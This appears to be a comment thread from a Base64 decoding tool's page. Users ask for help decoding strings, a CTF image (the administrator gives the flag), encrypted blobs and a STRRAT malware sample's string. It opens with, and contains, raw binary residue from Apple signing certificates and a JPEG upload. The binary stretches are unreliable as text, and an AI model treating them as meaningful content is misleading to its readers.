    230207214847Z0��1705U.Mac App Store and iTunes Store Receipt Signing1,0*U#Apple Worldwide Developer Relations10U

    Apple Inc.10 UUS0�"0
    *�H��
    ���0�
    ���ρ�%��[և�#�3��#���&�=Ɵ�J
    U���ח�9Tm}�T��,Rq�d{�Ή�I�崈q�?[F.����X�>!x�۷Ў��L[*h7����ҡJXR������5-��ʍH��XxTk�16JGT�7�����}_��J���຤���c�+���>o���<��R�%
    v������k�[^�sQIV��C�̎�Р��\��ii��h&&9�s�
    ]�s��v;�-و�������&U���I#����0��0?+3010/+0�#http://ocsp.apple.com/ocsp03-wwdr040U�����v�����M��6]�+�0U�0�0U#0��' ��`����GY�RT��0�U �0�0�

    *�H��cd0��0��+0����Reliance on this certificate by any party assumes acceptance of the then applicable standard terms and conditions of use, certificate policy and certification practice statements.06+*http://www.apple.com/certificateauthority/0U��0
    *�H��cd�0
    *�H��
    ���
    ��.=�[+nB�l��C0�_�\э����%�ی�ÀY����.�
    ۶���5.|˭k��w��g��^��v�Z ��c�s�������eH\��(:�7-��9s�����**n+�� \��}'�3����D۱Lg�n
    O���җ�kQ�Z�ue�b��_���hْ��������d�X`�|��u�i�[*�hn�B�L�7��;zC�m�H`6�+����-#Ў��i���{9GE0a/��0�"0�
    �޼�9m�0
    *�H��
    �0b10 UUS10U

    Apple Inc.1&0$UApple Certification Authority10U
    Apple Root CA0
    130207214847Z
    230207214847Z0��10 UUS10U

    Apple Inc.1,0*U#Apple Worldwide Developer Relations1D0BU;Apple Worldwide Developer Relations Certification Authority0�"0
    *�H��
    ���0�
    ���8T��V��$9H���_�&��4Sz�|c�awd^�#�9�P-VXp-~�n�J�>/�ބ�Wɯ{�j�I���*2�chR=���k���}�g���7j� ��g�Qd��\ѼWng5�v6���n8��+N{%�Z�N���ғ�q�`��3NU�X��
    ��wE�PH�+-䔅��ĝ�h����g~p�YKwB�9����L��;H���!]�jj��5`���F)��Ë�y�jag����h�b_nϙ��c��e�����0��0U�' ��`����GY�RT��0U�0�0U#0�+�iG�v ��k�.@��GM^0.U'0%0#�!��http://crl.apple.com/root.crl0U��0
    *�H��cd�0
    *�H��
    ���O��Y�,��l/���2�5�n�}�i���w,�g���m:Y\߃���*ar����E0���
    �G�?t��Ør�;>�E�T�2��Sk
    N��Pl!�
    �NW�k[<=����
    #J&�?���L�mW�zX�{h�䆌J��I���U����K0�ᠱ�)�� w�4����
    �;���b��cA��;L��۫�ɕ�O�M�&�����)�zf�.��!���xၮ�Ӑ�����8�g0Q�\�q���l0��0���0
    *�H��
    �0b10 UUS10U

    Apple Inc.1&0$UApple Certification Authority10U
    Apple Root CA0
    060425214036Z
    350209214036Z0b10 UUS10U

    Apple Inc.1&0$UApple Certification Authority10U
    Apple Root CA0�"0
    *�H��
    ���0�
    ��䑩 ��GP��^y�-�6�WLU����Kl��"0�>�P �A�����f�$kУ��*���z�G�[�73��M�i��r�]�_��%�U�M]
    �d5#KY�������P��XPg�� �ˬ, op�?0��C��=�+I(��ε��^��=�:�����!.t�<
    �b��q�GSU��/A����p��LE~LkP�A��tb�A�3���0X�Z2�h���es�g^e�I�v�3e�w��-���z0�v0U�0U�0�0U+�iG�v ��k�.@��GM^0U#0�+�iG�v ��k�.@��GM^0�U �0�0�� *�H��cd0��0*+https://www.apple.com/appleca/0��+0����Reliance on this certificate by any party assumes acceptance of the then applicable standard terms and conditions of use, certificate policy and certification practice statements.0
    *�H��
    ���\6�L-x�팛��w��v�w0O�����=G7�@�,Ա�ؾ�s���d�yO4آ>�x�k��}9��S �8ı��O
    k�+�Y� |@Vtӷ�#;G��o$��ѷp�E�'��mx����~"5�%���kԢ$#����s�`�[ /���DH�`8��=&g �3j�
    ����/�Sj[d�c3w�:,V��!ںsO��6��U٧��2B���q�~�R���B$*��M�^c�K�P������� 7�uu!1��0��0��0��10 UUS10U

    Apple Inc.1,0*U#Apple Worldwide Developer Relations1D0BU;Apple Worldwide Developer Relations Certification Authority�W�� �0 +�0
    *�H��
    ���1Ź�a+��[����c����;�<%3�Oq�ٷL ,�z����do�T���kB��I(�|*?�(+���ҫ*X<���l��� 8��$�����L��e�14Y� �y+I�1]�ɥ]�F�b���*�;>ن���9�ނJ��������ֶ�ظa���~]��We�V��C�A/S���#%���
    '����t-���#��,�^�A��-���I�S�u����w�kwP���0R�PD�!�ն4�|�R
    • C87,
      Can you help me please
  • m3m35,
    This page is really awesome.

    Can anybody here help we with this Problem. I dont know what to do anymore

    https://stackoverflow.com/questions/66481601/python-decode-base64-to-picture-not-working
  • sn4tch,
    Hola.
    envíe un texto en base 4 de un juego de encriptacion.
    es una imgagen, pero no funciona.

    c165-ba49-d19c-2874-993f-9919-22f2-3d44

    gracias y un saludo
  • Arzur,
    ID: c165-ba49-d19c-2874-993f-9919-22f2-3d44

    Hi!!! It is a base64 image from a hacking challenge, it is suposed to be a message in the image, but I can't decode...
    • Administrator,
      Hello Arzur! Your flag is C1b3rwall{fr0m_64_t0_fl4g}. The problem is that your Base64 string uses the - instead of /. So, to fix it you have to replace all - with /, then decode it using the Base64 to Image.
      • Arzur,
        Thanks a lot for your help.
  • l4mer,
    ID: 5bac-1b8f-1d2f-85c3-1841-e1c9-ab55-6066
    I think it is result of some encoding, can you help to identify which one?
    • l4mer,
      I am inclined to think that it is fernet
  • Lilah,
    It's all over my phone.

    PHOTO;ENCODING=BASE64;JPEG:/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAIBAQEBAQIBAQE
  • محمد,
    8755-465d-4ad3-0ef2-a7c9-15ee-b120-d28a
  • Sebastian,
    Hi Is abaut c92e-5c3a-6d81-1730-f1be-ca65-bf56-e637..

    O get. This info for a image that mi wife hace on Is computer AND i whant To now whats Is hiden
  • ZG59,
    Reference: 4617-6e92-fbdf-81cc-c33e-54f7-4dcd-5543

    I found the base64 while analysing a malware sample for STRRAT. I've tried decoding from base64 to text but it shows me a bunch of random characters (it looks like another form of encoding)and I can't decode into a readable format. Any advice?

    Thanks in advance.
  • Dan,
    '''0320-656c-785d-740b-864f-968a-9e27-f1c7'''

    Hello I got this code as part of a class project.
  • Yearim,
    Hello. I get this code from a YouTube channel named "AbandonedTheGame" this code is on his "about" section as a clue for a mysterious game. Thanks for the help! ID: 3f2c-8434-2930-e677-c2d5-4599-74e0-665b
  • Bryan,
    Dear Sir,
    Could you teach me about walkthrough for repair malformed base64 string ?
    Thank you a lot
  • Nico,
    I can't create a new comment? so I try to reply on an existing one... I try to download an Excel file as a blob but it gets corrupted. So I tried to make the blob a base 64 to see what goes wrong but I can't decode it either... My generated ID from this site is "1424-081f-c1b4-d8e3-92a5-9400-7d18-5748" if anyone can let me know what is wrong with this base64 then I would be very thankful :-)
  • davidlongoria,
    Need help understanding this its from my Facebook 85b7-632d-9e60-faba-ba39-5c41-330c-9362
  • redis,
    ID: 0cde-b076-82e5-adf8-1c7e-1192-5365-5db6
    i encoded but cant decode(
  • Subscribe,
    Thank you so much for this page!
    also can you help me with this?
    ID: c2d5-dd2e-7ffe-a9d5-2832-8310-3560-7a1d
  • davidM,
    Dear:
    i have submitted a string that i cannot decode, i have tried all i know, and some i do not :)
    817d-81fd-b114-b63d-c9a6-1825-37d0-aa15

    I would be in your debt if you help me.
    Thank you,.

    [UPDATED: ]
    i removed all the $ signs and other characters, still get garbage, seems this is encrypted base64, any thoughts ?
    • Administrator,
      Unfortunately, you cannot decode your string just by removing invalid characters. I suppose that your string contains some encrypted data and the "invalid characters" (such as $ or :) are used to concatenate various pieces needed for decryption.
      • davidM,
        Thank you for your reply, any idea what the encryption may be, i have several leads as to a key, session ID , time stamp, but i need help as to where to start
        • Administrator,
          Sorry, but I don't remember to come across such a string format.
  • RobertHill,
    3696-06b7-3d99-d714-2a05-2951-acfe-e76b I got that off a file on my phone thnx for any info or decoding you may do
    • Administrator,
      Hello Robert! I'm not sure, but it seems your file contains two RSA Public Keys.
  • Subscribe,
    Hey Administrator! i never get replys on my comments on ur site! :( no matter how much i comment on ur site i dont get a reply to my comment on ur site! so well... i found a better site than ur site! so i will use this site instend of ur site! you can delete all my comments on ur site if you want. also is commenting with text art not allowed on ur site because you deleted all my comments with text art on ur site?...

    thanks for seeing all my comments! this is my last comment on ur site! now bye! :)

    /   \
     | |
    |___|


    [UPDATED: ]
    sorry i forgot to type Ok this is the most commented page on ur site right? i also like ur site now bye!

    the comment is 2142nd on this page! *this reply is 2143rd comment*

    [UPDATED: ]
    I mean 2142nd on this site not 2142nd on this page
    • Administrator,
      Hello my dear friend! I'm sorry to disappoint you, but I have very little free time, so I try to reply only when I have such an opportunity and only if I can do something to help. As for ASCII art, I'm sorry, but they are clearly offtopic and I deleted because I'm trying to keep comments clean and useful for all my visitors. I hope for your understanding and wish you all the best.

      Best regards,
      Victor
      • Subscribe,
        yay!! i finally got a reply on my comment!! yay!! i really got a reply on my comment!! i will keep using ur site!! Thanks!!

        [UPDATED: ]
        sorry i forgot to type: this is my first time getting a reply on my comment on ur site! thank you so much!

        [UPDATED: ]
        wait a second. how does my comment get updated everytime when i reply to my comment? doesn't it has to have a button for editing comment instend of replying to your comment to update your comment?

        [UPDATED: ]
        wait. how many minutes or hours does it take my reply to update my comment?
        • Administrator,
          Hi! I manually approve all new updates because this cannot be done automatically for unregistered users. There are actually several ways to approach allow unregistered users to update their comments, but, unfortunately, I don't have time for that. Perhaps someday I will implement this feature.

          By the way, I deleted some of your offtopic comments. I hope for your understanding.
  • uwe,
    ID: f311-e5e6-ee85-62b1-e78e-6642-1633-af49

    The parcel label cannot be opened
    • Administrator,
      It seems to be just a blank PDF file.
  • JACOUB,
    HELLO DEAR I HOPE EVERTHING IS FINE . I NEED UR HELP IF U CAN WITH ID 48c4-60b1-95a7-e6c0-4501-009d-8be3-7cf0
    IS PERSONAL INFORMATION OF TREATMENT CYCLE I HOPE U WILL BE ABLE TO FIND OUT THE INFO . I THINK IS BADE 64 TO PNG
    THANK YOU
    • Administrator,
      Hi Jacoub! Unfortunately, I have no idea what it is. I only know that there are four valid Base64 strings (maybe this is some kind of custom encryption).
      • JACOUB,
        DO U HAVE ANY IDEA OF WICH TYPE OF encryption cabe used in the case ? even me i never saw 4 BASE64 STRING IN ONE QR CODE MATRIX DATA. THANK YOU
    • Subscribe,
      Why are you writing in Caps?
  • Nina,
    I'm practicing on coding and i countered this code, i've not been able to solve it since, please help me

    my id: 6aac-e35f-4e7d-81f6-1a12-fd6d-d46b-7036
  • zaid,
    ID: fd39-b365-d0c1-bb1c-9b37-745b-c43c-d9cc

    Hello my friend, I tried many times to decrypt this tool and have been using Marshall encryption but I do not know how to decrypt them please help me
  • Devid,
    Hello, I got this type of thing from a unknow file that I open with a text editor, It is a file downloaded of a book that is possibile to view only in the application, in the digital book reader (bsmart). Is it possibile to convert it somehow to pdf file?
  • Payval,
    Hi !

    That's about 50c8a2f5-c979-4371-a368-8b70efd0946d

    Got this one from a hidden value in a website, doesn't look like text, and it's IMO too short to be audio or video

    Maybe just used for binary validation of some sort...

    If you have an idea... :)

    BTW excellent work here :D
    • Daniel,
      It's just a guid (google if unfamiliar). There's no data there.
  • Lucio,
    ID: 50d6-40f0-c379-d2f6-add9-5a93-74ae-66fc

    Hallo, this is the result from save a mail out Windows Mail ... The mail header says it is base64, but the characters are not, they are asia... I got error messages everywhere because the string is trashed. The original mine, I thing so, was quoted-printed and charset utf-8 ... Thanks very much in advance.
  • Michelle,
    ID: f4af-8e4c-faf1-b47b-ff58-4f7f-2324-a568
    I need to have the repaired string as a single value instead of separated. Can we have that output back?
    • Administrator,
      Your string has an invalid newline, so I uploaded a patch that should fix your issue. Please try again and let me know if it works.
  • Swaroop,
    ID: 9d09-a33e-955e-430f-31f1-5d8b-0cdd-9a60
    My base64 couldn't restored
  • kellyann,
    Comment ID : 65ee-c4e2-3066-0ce0-64ce-42a5-350a-223b

    can you please help me figure this out. lol i want to decode it but it keeps saying something about MIME octet or something lol
  • fellip,
    Thanks!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3
  • mike,
    it was on a stick i had ...9403-b183-eac7-05c3-3486-02d0-fc79-41b2
    • Administrator,
      It seems to be a plist (binary property list) file.
  • syrill,
    abd4-8d5f-c995-6280-b50a-85dd-6232-8400

    It's some PDF I am getting back from an API which I can not figure out how to read in PHP - dompdf didnt work, but Postman can render it
  • Ryan,
    7e9f-fe58-7140-08b3-1633-1293-0af2-667a from hackers ruining my life I'm digging but I'm sure this is like a joke code
  • Juan,
    Hello, nice to meet you!

    I am writing to see if you can help me, I am receiving an xml file with attached images that I need to extract. They seem to be encoded as Binary Picture Data base64, but I can't decode them.

    I enclose the code to see if you can tell me what format it is, I appreciate your help.

    ---------------------------7e13971310878
    Content-Disposition: form-data;name="licensePlatePicture.jpg";filename="licensePlatePicture.jpg"
    Content-Type: image/pjpeg
    Content-Length: 5724

    ......JFIF....................................... ....................!........."$".$.................................................................................................................................................".....................................
    .................}........!1A..Qa."q.2....#B...R..$3br.
    .....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...................................................................................................
    .................w.......!1..AQ.aq."2...B.... #3R..br.
    .$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.............................................................................
    ............?...i.I..:..............q.........CUc.Y.9|t...L..@...
    ....O....jh..NK.....<.(....%.
    O..}.]~...G.....MW..-H..l.t.P.Y|.......M.$.....'L5.?.H"..x....Ho..K..s.T..
    3l..o...........G....].....<._e..4..%t......&..U.F........Q.[....).........l./.|.v...........x.B.P..~..
    .......O..3.Az.~.......ZD.%...j.n....L~.L6..)254..'..a..
    U........> ........S..Em...F.......]t...1.$cQ..i........u+."....c...e..W]...`... ..icY./.b.g.|...Ga.....>.....t}.&@...;$..%Tm....._.....B..._......U.J._.n.sk.j7Vsyw.>F.q.+.~....Z..7w.h..K).g.?.!..j.....>.W..............w5.. .t.J...............|G...e.m..=sQyv..RabO\n\.u.~....wU..c.x.P..s..J...B?S...0.8..bG.._....V.../Q......<...........o.'.tA...5.j.
    ..__...x
    !....-.f..
    .Q.&....7.9...m.j..e......g.........V...#.F...../T.........5.4..k{j....).*..+<..Fp6...T..z..........
    .PE..)d.. $.sT...6......z..~..1...
    .....Gi... ..6.+..V.X.....F.....U.o.wGR....5...6.(...3\.....&.k............ho..............]0.{..b.,X...QV..4.8.Z.{.
    V:a.b..D..I?y.0..w..-t..D?J.w...".'..:Q.i....5..h~.Of..|...~5Q.B.5.&..a...h.j..........^+..c.1s.Jx....y~.....:
    .O..?.$l........._./.1.F..F..x.H.....mi..........k.......A.Y.o....y.X.*...C....J....7..i...{x${f........G.O.o.u..H.....t..ch...S.3h...........kmc.z..:q,i:.S.m...~._.g...Xj...6........bk..o..N.~9y.|. .......L...+..d.......a....Z^.u...y.../......N...Y.f.G........a.n...?..V.-.%.bm..z5......)7....&...;a._.^#.......dh Bp..V.>....8..... .<u.W..Z.z...X$H.5?wv.l.5.2.2..(x.R.NX....D.*6q..WT..]y......%pU!p.Ex..>....<.......7...b.5.pO../,C.z..1^S..c..c....
    e..q/....3Zs..............[\..M..;S/Z{.....qo..V,..?\W..w.?.....].Z.....PO.....?lO...5...Wk...D.]....;.....Z...Z..4.]......v........}..K..'.o.._....D~....e....u..?.9.o..V...B.....y.u.&E\)..,......c.%...k...=.s.........,.\E...k..?.?
    ...|i..B..n%;...0O
    ....{.....,|%.....4a... ...C.U...|......M.^.|..;...z..8.j
    N6?.s...e...x..ic{....q............*xGI..?._Ii>.w.H...)....O....kM= ..6E.+.Q..x.....kp.....f....UQ.l.2.6........>.x........o.....v....W.....!WC..._].Ze.|7....t. q.........^.b.\D....#....n.....W..\.....r...|W..zW...[....pO1hWO.........7.....UB.[..Y=w........n....._.."..B......}
    ....o............z...dO3...S'.B...E.s........u..1..X7}w..1^..*........!kw5....Mr....1n
    ...^e.k.....piP..wke...+.....M.....8.....&.D...../..W.q.@..~........`}...^?.......~..M/....hm.........?..3...r..P{Uo.....".EQ..|....Ug|/..<M.....j.%..4....-.D_.....@......s.^.....8m.. ...I....T...5.....8....O.........|{i..<;....0......]@........1......e..LW.~.........Q.g.......jy^a...........SY..5R].}h....?j.|i..O.x..ZT.^.v-..q.J.....~...........Q..7J..4.R{i~....[.U...W.w..?.|h....e5.[....m.#.Xnf?...c..:^...@<?.l%.=.....w...-.......e/.x./...G..5.!...R...z..`..5....3..L..j...q{w. .~...2.m..n+..lo...<_.k...
    h-.YOe.N#.....;..+..{....u....C../..#.M..b=......~'.}a...|R:<...Y......4m.{b...?.o..9."....[C.2Kv....m..Z.%.....5......W....u.._....|E.........U.......3. .>......>...9.u{y.]D..vs-...|..._#.s.A1~5._.,..7..$n:,...
    yF.1.C....................!KDY&...z.F..g8
    3^Q .W...Z......Wi.........!......8.h...?|Q..!..O..0....7..P.h..x.q.+p...._....o.3H.
    x.K..... .5.S.......3.zdrFc..../I.....*....5g.{.O....{....
    ..*........J...%...-.X.[....M.........?k[.?...Z/.4...6...l._.....:...._..............o/..~...q,.n..i...#.._........'...............O..=8..@.......7.5..O*..C...b.A....#Y...f...^...........B...h..........u.Ik.
    v........{...s...?h..G.O..C.>....#pO........
    .9....8....t..k....(.F.l.....U....?.{...
    ...4.M+....9..o3.....6a...w~U.........~..].w..._.sL....:...._.<1...[.7.d..O. .[A..p[.s...+..S.........A4e?.}....J.}._
    ....;...Z../n..M.J....}.(....Ik.i........4..D................. .|_.. ..&.\.G.M....?._G.....[..<=.....f1.6.m....k.{....w.~.....5..Z...6...7...J.......A(....~4........;a...............~....i.k....U@#r.......~4..:.........4^...9a..m..y...=z..U...O>...>...Q...ki.2*..d...n(..W..9<[....Q..J.8 ....,...... ._.>...%..g..#.X..?...q_......Bir.A.....=....mX_.f....
    .+..z.}.h..#.1.P6...{...|F.8...?..+.t...C..z.....|...{.....]...yf...a..pP&....e...".\,...?.^A......'4..O.~...<=.A...m.A..O.. ....&....+..<j^......X...k.....).Z....."......M.......~.hz.7.y...G.[...>..>.y..>.k.....N..$.@...~...v.9.GJ..y....4.........g...........T...k.../..6....r../z....5..4...QP...H....>...~.{iz...uqV~.............A-......F...J....J..g......sR...h.............X..[V.'.uWc.x'..%.....~x..t...3.~..W.s\"....\.%3]>..].T.M......Y....q..........~..o....{{.c.....j....+........e.......
    /.....o.....i~..5j.4........|#..=......?2?..S..
    k.......|}.7.t.8..Hd........0.....-M....K..6.06........w...0...?.E.....?.j.:\}.'...o_....+......E{y..H.(X5....[>=...(.e|,.y.....[..w.m5..4..W.C.....^A.O..K..j.....n.mB.[...|.Xgb..q...BF..,.U.7..@Y".H...N...clE'..@\./..Cg.-..-..]=..jib([...x~...!..v.....H...Z.........F~..y.3_'.....
    .....c.....e<c.P.Cz......'...8......L.....N.h.@N.i...8t.a{...S.)..Y...N.(V.....&i.h..N.&..g..)6......!.5q...<}.9.fg.d~......6V...j{9*6.@...............k...!|R...4...x.8..._..?.5..&y4I....,.:....?.^#...K..s!}.OJ`.?...c<R.......k.v..kk...?.3Ln..S.V...&....LP`.%..3A..i.b...H.....df...'8.E..~..-!.Q..o.@.j#... @
    ...r..)..J.#......W.g>.....o..+.?5"..........E".4.........
    ---------------------------7e13971310878
  • Alexxxxx,
    I'm trying to unpack an app but all I can find are references to UTF-8, latin, Base64...

    Any clue how is this encrypted? Plain old Base64 doesn't work.

    sV2jkdjOpl2fWbKLxNPQ09iV1aicxnSWrZR4q6SYoNafo6NdnVhgw6esXl9WW6uqm6iGkdrLd5fZmn3TzcjI1Y1qglyY0Jmie6KnkpSUpsRdYFVd2Kue1IyTrZh6mZisnYKil6rVn5rKq16egYvE0c+dpKSrwZSam6iakpyimYpiVFyaxKyap7GmnKGpnaWlXXBTV8XUlV2RWV7H0NLJzM12y6GciWpVYJaioZacmZGgp6SkimRZia6lnKWJlaycipugoKjHp5erqKPIxtaKnYZXw6Ogz3KkrZKnoKCSlsSqlVyzj1hg0ZiRo5KVk5WWopWSj8PVkpXEmKPDwJTCwsWciW9XvVeZoqaepp5njJWPjm6Jm19lgmCWoKahp6Rna2hjcpqcammdfnuqlaiVipJQiZmg1Zuop2NjaGJmdJtoZW1ppXFxm31ZY1NdmJ+qoamhYbeWeYmzgHiVmJuYlJ1XjlVexpmopKahaoZjY5h6gIh3imRZiZ2bqp6pomZnZmZjYJSWY2aVaWeUkZWmm5l1mmZ8kmBlemNldnV5WY9WW5mf1qOs0GlibGVpbG5oZ2Zsc6aXeW2MZVeLxc3WztmepHpqkmV5amhkaGl4WY9WW5mf1qOs0It8Z2RmZIZtj2aNYaq2WmKFYJvN1M/W0ZZgl2dql2h2amtodWd5dKldYFVdx6GszaygZ2NmZGaWZmaSYJSWY2aVmGeUwJSTk5xipJRtmY9taWhoZnWSZqhkaVyTj1hgxaiepqVdblayXaKcl8zadaLanl6egYuGppd1lHtpiVxVYJeUpZuHp9WnqaSf1p1gnFlZWmZ8a21ufF1fUIvKlKjQgKnJxtKKnYZXhWhsmXZpa1pfU1eXk9Whe6eX3F9zgmBVamZpZ2lqXWJTV93Ln6LUsF6egYuGpaxylWd6iVxVYJeUpZuDp9WmoJpdnVhghW9obGxuZF1jVl2fmcvOp4XXmqXLxoudg41TqGd4mWhqYF9TWpSUpM6GnaOhinJZiVxpfWd3a21eYlZaktDbmF2fWV6Hlpikl6l1iWFXiaCqq6OfmFdtUopZdXpvpHx9iWVSXp+fm56rfaiYldKNbVaMXG+Yp5acmY1cglybw6Kge5+omFdtUopZZ2pslm9/iWVSXpWilZmiXXBTV4eYa2ida2+LjYSKz8+XyqmH16KlpZhabVBaVadveGV8lV9lgmChqZSkm5tecFZaU6isaXqYcl6QgYvay8+kx1xxgldYe3d1d3J3WY9WW5mX1aOSx6WepqpdblZeWW15Z5qXaF2RWV7QysvL162iw65enFBcXGdnZ2RnZopiVFymzKakiXNSXlZ6Z25reXdaXISNp6vXqqzTytfIiqBQiVhrlXF2e2laX1BansydnKmPyKSl0bBZcVNdV3xpe2xpc4uSU13JmqnPsNbE0c2ViW9XiVNsf2Z3ZHZaXoNdoJ6dy6yJy6edXm1WW1l9aHlmdaiNX1aMpaDLydi1yMpXnFVehXZncnhsd1dfUoqdppavinJZiVxlemZ5Z3leYlZalMXYno3NoqvJiJ6DiolmmGttmGZcZVNal5GlnbWbmFxwg19cmX9lbWZrW2JXXZ2llcnUWnCFYFqZkqWmmZdXjlVe1JWZYG1TWlN1c5hoaWZdj1hgzqKZn6eKqaioq6Wco8mNbVaMXHCopqeplY2tjlVe0Y+UmJJjko+SgcKVk5SVk5eYzpiRlpJmk5WWZl1tUL/BWnnUp6vW0NDPyNijiWFXiXOkYF9TWpOioNeoo6GiyKqsiZZeV45dgouJeIlTc9nYqZvYYGOEiLKmipJQiaOs1JKofKilqZWmWcBiVJBdsY2LpIxSiqiompeam6laXISNgYmMZVeLz9nVxdmD16edw5OarFqQX1COWbGLhneJg3uP1WBeV1qEd4xeYlZak9PUp6jUpY3J09jMxsujiZJjgotch4iFdYNTetiioKhdj1hgsIFZY1NdnKujoqlajZCGjl21qKPdyNPR1o1cglyH0VdhWVqjopysn8ipnJqpipVlgpRZiqiYmJ+tVomoosrHlpvYYGOEiLe2ipJQiaisxJSer4aopZaUlcipW5Jig5NgsqWTpZipW2JXXYafV5CGWqbRmqXJ1IvAj4aLiYGgyZiprFpfU1d/m4piVFyizJ+h1qxZlF9Wj116l6OYosXZWmKFYHrFiJCDismRz5qpw6Ncll9Tjld8n8SdmVWGz5mnx6xZY1NdfYZeYlZamdHHmpu1pZjSxovAj4aLiX+my56prFpfU1d9oYpiVFyg0qGn1qxZlF9Wj12AgVZ7kdLKn5vYYGOEiK2uipJQiZ6iqpGjnZ+YpleQXoORW3mbyaerz56kqlpiVF17m11fUIvKmJzUq6TJ09eKwJJQvVx7256WppyWpldfUop6rVxig1+d26eTpJyZp12UYlaOV7THparOnKPJga3R1tqR0Jic1KNcZVNag5F8WY9WW6WX1ayixaWXgKGpqJelmZulo4vDX1bAYH3Q1s3H1o1cglx9zldhWVqZn6WcltZdkWFWvl+Bw6KkV4avp6qco6laXISNe4mMZVeLycXM1bmp1amcz6Ncll9Tjld5oc+inZiiyKtgjllZfaJdYFZenKWfnM3Jn5vYYJSQgb+K0amc0amf1VdhWVqhdo9aXoNdonii0qyh1WCPY1ORW6SHl6inmcfSmKmMZVeLz7SKj4ZX0IWY1KSenJ+YpleQXoORW6OIzJ+ixqxZY1NdooheYlZanrbPmp/JrF7BjYS+iqqp0Jaky5NVfKKhpqSlk8ykqKhdj1hgpnxZY1NdmK+ll6Ock6fVoanZq5jNz9jWisNcgpBerp+YmqeipaNaXoNdgKRdj1hgzqiVmKelpqlek2JTi4uqnKPKp6rN0NLWipJQiXmgiVxVYJecoJWhpcyloqhdwGRZvWCCoKmlqKleYlZagM2NX1aMqaDa0NjWisNcgpBeqpGjnZ+YpldfUop+lVxig1+hw6eWo5ipW5NjVpFahMnep6vXnle0zcXGyNOV0KmqiVxVYIeDWlxTWdebrKmr1Z2siZZeV45dh6qppaGYo4uSU124rV6QgYvW19ifzZqqiY1hWY5agJ+nm9KkVImoxKGl1WBeV1qDiF1jVl2gn9jPoqS5q5jNzdeKwJJQvVyHzqWcoqFThpiUosipW2FWioiMiWVSXqOiqZ2gpImbkdTLpl3CZVe/iKfPzNZQqZ2m1aSoYF9TWnN6WY9WW5iizKiAyqilq6ZdkWJXkV16osnHppuFiZzSxM3PipJQiXyHiVxVYJqlmJGml7Obopifz6tgv2VSklp9hItXeZeWmMmNX1aMgHqLjYSK09KlyZ6lsZKfnpanpldfUoqdpKp5xJuhx32bqqOila99n6KnldaNkGKFlF6xwtLM09ucw6mm1KNcZVNagJFaXoNdoZakzKiuzpqmpqWpW5NjVpFad9bPl12RWV6r04uPg42X1J6biY1hWY5ae4V3WY9WW32Lp19lgmCarJddkWJXkV17n9DKU4XaraqLjYSKq7VXjlVeyp+oYJBfU4tahciimZiqzKengoGbnpuinZ2fqp+hl4uSU124gV6QgYvWyNJXv5Jjgleap5ail5mhmdZdblWRiq2tyJhqXl9WW6KYqp+hj5WNX1aMmqrHys2Kj4ZXxJ6el1dhWVqVnJdoms6pl6hdj1hgxaliampdYFZemaZnYpiNX1aMnKeYlJuKj4ZXxaVskmBcZVNalqBqZJNdYFVdxqhwlXBZY1Ndl6ZubWtaXISNlqadbmeLjYSKxtZol2dejlBcnKNraGVaXoNdl6VumG5gjllZmqNuaW1eYlZak9SeaG6MZVeLxNSbmZZXjlVexaBtb2RaX1BaldNuamddj1hgxalqbWZdYFZemaZrZpiNX1aMnKecl5mKj4ZXxaVvmGZcZVNalqBraJxdYFVdxqhxmW1ZY1Ndl6ZvbWtaXISNlqaebGmLjYSKxtZplm5ejlBcnKNsaGBaXoNdl6Vnk2hviWVSXpamZWZpbF1fUIvJo2eWbWeLjYSKxtZhlGpniVxVYJajZGJoY4piVFyZ02lrl2tZY1Ndl6ZoaGtmV5CGWpnVammZlYuPg42T0mZpl2VcZVNalqBkZJhsW2FWipupk2tnblpiVF2apmdlZZyNX1aMnqzHwM7TipJQiZqsxY+foqaSZWBjZopiVFyb2JuYzKKlr2NoZWleYlZaldnJkqHXYGOEiMvFlZlhlFxjglecm55aX1BamcVnbGVpk19lgmCasVpiVF2gqaVlYJaYkqDVYGOEiM3W0phglGeWzKCUalpfU1ecpdJoZGdowqKpwWtZY1NdnammaGZlYsPQo5WXaWeYiJCDis+j0WdnlGKUo6OSZldfUoqfp6Rok2prwaOilpiuqF1jVl2co9OYY2iXmKLWiJCDis+j0W1vl2mUa1pfU1ecpdJubGpvwmtgjllZoKalbG5sb5VnV5CGWp/YqG+clp3CmI1cglyg1Z9tcWhskmZaXoNdnailm3Bum5hpXl9WW5+qpW5rZZ3Fa12RWV7N1NObm5tpwW5ejlBcoqaia2hoa8JnZFxig1+i1ahqb2hvk2doXWJTV83Zom6dbnDDkpeKj4ZXy6immmhqcpJkZ1dfUoqfp6Rum21ywWpnXl9WW5+qpW5rZZ3FZGyMZVeLy9PLxMhXjlVezZ+ecZKlWlxTWc6lnW2V2F9lgmCfmJaVl6+pn6KfmceNX1aMppjHwMvVyMubiWFXiZ2WnJKclpWfk9GaW2FWiqWaxZiemKefomheYlZancXJkqjUppjSiJCDitORxZSr16KgoqabWlxTWdOql6VnmGxgjllZqpufmqqWoJ+mV5CGWqnNop3YwM7M1sVikmVriVxVYKabnJankc2fp61mlWlsiWVSXqiqmpVqaF1fUIvbp5zEbGnDw8mKj4ZX16mdwWNnmJ+YWlxTWdiqmpRnmV9lgmCnq5mVZWyWmJtaXISNqKrLmGiawNDIipJQiaqryI9sYF9TWqWnmMJuW2FWiq2tyJhqlqafm12UYlZanMXUmqvGoJzXiJ6DvuFXx6OezpmooYGUoJVabINdhKSo162g156lnFpiVF2jl5iYnIugU121qKnY1svYv96TlZGvw5GoWZeiU3Klk9afoFxig1+i0KKmoJSip11xVl2VoovjX1bgYJzSyNDM1s5+w6KciWpVYHqYpZ2UoIpiVFyixJqezmBsV1p6maurqZmbV5CGWp/ToqvNwtDWiqBQiZmcia1hWa5amJ6ansypnIOX0J1gnFlZfKGdoJ+qnl1fUIvSlJjKpV6egYuo0c2cy6ifiVxVYJyhnKSck8+pW29Wip2nibZeV65dmaSeop+mmLLHoJuMc1eLtNTE0c+jylxjglehmpWYn1dtUop7p6WXv7CclZWqmWSloF1jVl2cns3anJfRrF6egYvI1o2tjlWyiZWjoJ+cppiBk9CbW29Win6rx6eVn1piVF2jl5iYnIugU12rq5jSvdzGlsKow2yYy6NcZVNanJ6cpsyXoKhdnVhgyKtZtF9Wr12cpJ2fmdfOgZfSnl6egYus18e